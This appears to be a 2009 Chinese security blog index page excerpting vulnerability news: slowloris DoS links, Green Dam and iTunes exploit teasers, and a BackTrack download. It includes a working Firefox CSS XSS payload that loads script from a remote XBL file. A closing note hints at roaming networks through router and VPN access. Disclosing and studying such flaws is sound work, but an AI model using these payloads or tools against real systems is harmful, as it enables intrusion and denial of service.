# 鬼仔:不明白为什么 pre 又 final 。
NOTE: Due to massive downloads and missing bandwidth, some servers might be unreachable and you need to hit either reload or click again on the download link.
Description: DVD Image
Name:: bt4-pre-final.iso
Size: 1390 MB
MD5: b0485da6194d75b30cda282ceb629654
Download: Click here
Disklabel: bt4-label.png
Tags: BackTrack
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2009/06/22
References: http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt
Overview:
Tags[not include <IFRAME>] in ie7/8 are don’t allowe to run “javascript:[jscodz]”,but
we found them allowed ro run where open it in new target.
like this url:
阅读全文 »
Tags: IE7,
IE8,
Vulnerability,
XSS
ha.ckers.org上发出来的,原地址:http://ha.ckers.org/slowloris/
http://ha.ckers.org/blog/20090617/slowloris-http-dos/
下载地址:slowloris.pl
Getting started: perldoc slowloris.pl
milw0rm上的地址
Multiple HTTP Server Low Bandwidth Denial of Service (slowloris.pl):
http://milw0rm.com/exploits/8976
阅读全文 »
Tags: Apache,
DoS,
HTTP,
Slowloris,
Squid
作者: www.80vul.com
1. firefox2 css xss vulnerabilities
<style>BODY{-moz-binding:url("http://www.80vul.coom/test.xml#xss")}</style>
test.xml:
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<bindingSpellE">xss">
<implementation>
<constructor><![CDATA[alert('XSS')]]></constructor>
</implementation>
</binding>
</bindings>
[PS:firefox3开始不允许-moz-binding:url引用远程文件]
阅读全文 »
Tags: QQ Mail,
Vulnerability,
XSS
# 鬼仔:驴爸,exp,milw0rm上的。
Green Dam remote buffer overflow exploit
“Green Dam” is a software used for monitoring and anti-pornography, popularizing by Chinese goverment. After July 1st, it will be forced to install on all new Chinese PCs.
Now it already has 50 million copies in China.
In order to monitor the URL that user is exploring, Green Dam injected the browser process. When Green Dam is trying to handle a long URL, a stack overflow will occur in the browser process.
阅读全文 »
Tags: Exploit,
绿坝
#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# www.offensive-security.com/blog/vulndev/itunes-exploitation-case-study/
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce – 06/10/2009
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
#
阅读全文 »
Tags: Apple,
Exploit,
iTunes
# 鬼仔:这几天绿坝是大热门,好多的负面信息和批评,就不贴出来了,只贴一个安全相关的。
http://www.cse.umich.edu/~jhalderm/pub/gd/
来源:Solidot
密歇根大学研究人员今日发布了一份绿坝的分析报告,报告中指出了一些绿坝的安全隐患,包括一个可以被远程利用的栈溢出漏洞。这三名研究人员分别是密歇根大学计算机系的Scott Wolchok, Randy Yao和J. Alex Halderman。漏洞演示地址:http://wolchok.org:8000/。请注意,安装了绿坝的用户,访问上述网址,浏览器将会崩溃(无其它危害)。当然如果精心设置网页,可以直接控制用户电脑。
Tags: 漏洞,
绿坝
# 鬼仔:当时看过之后忘了发了,可能很多朋友都已经看过了。
作者:Firefox
帮朋友忙 帮到目的不单纯 好可怜 被好多兄弟教训了
甚至被威胁了下…
总结下 教训…
关于单臂路由如果掌握到设备权限还是可以继续玩,另外一些对拨的vpn如果没有做好限制也可以溜达溜达,如果是帮忙的话 还是小心翼翼的溜达,不要做什么很实际的操作了,因为…
阅读全文 »
Tags: 渗透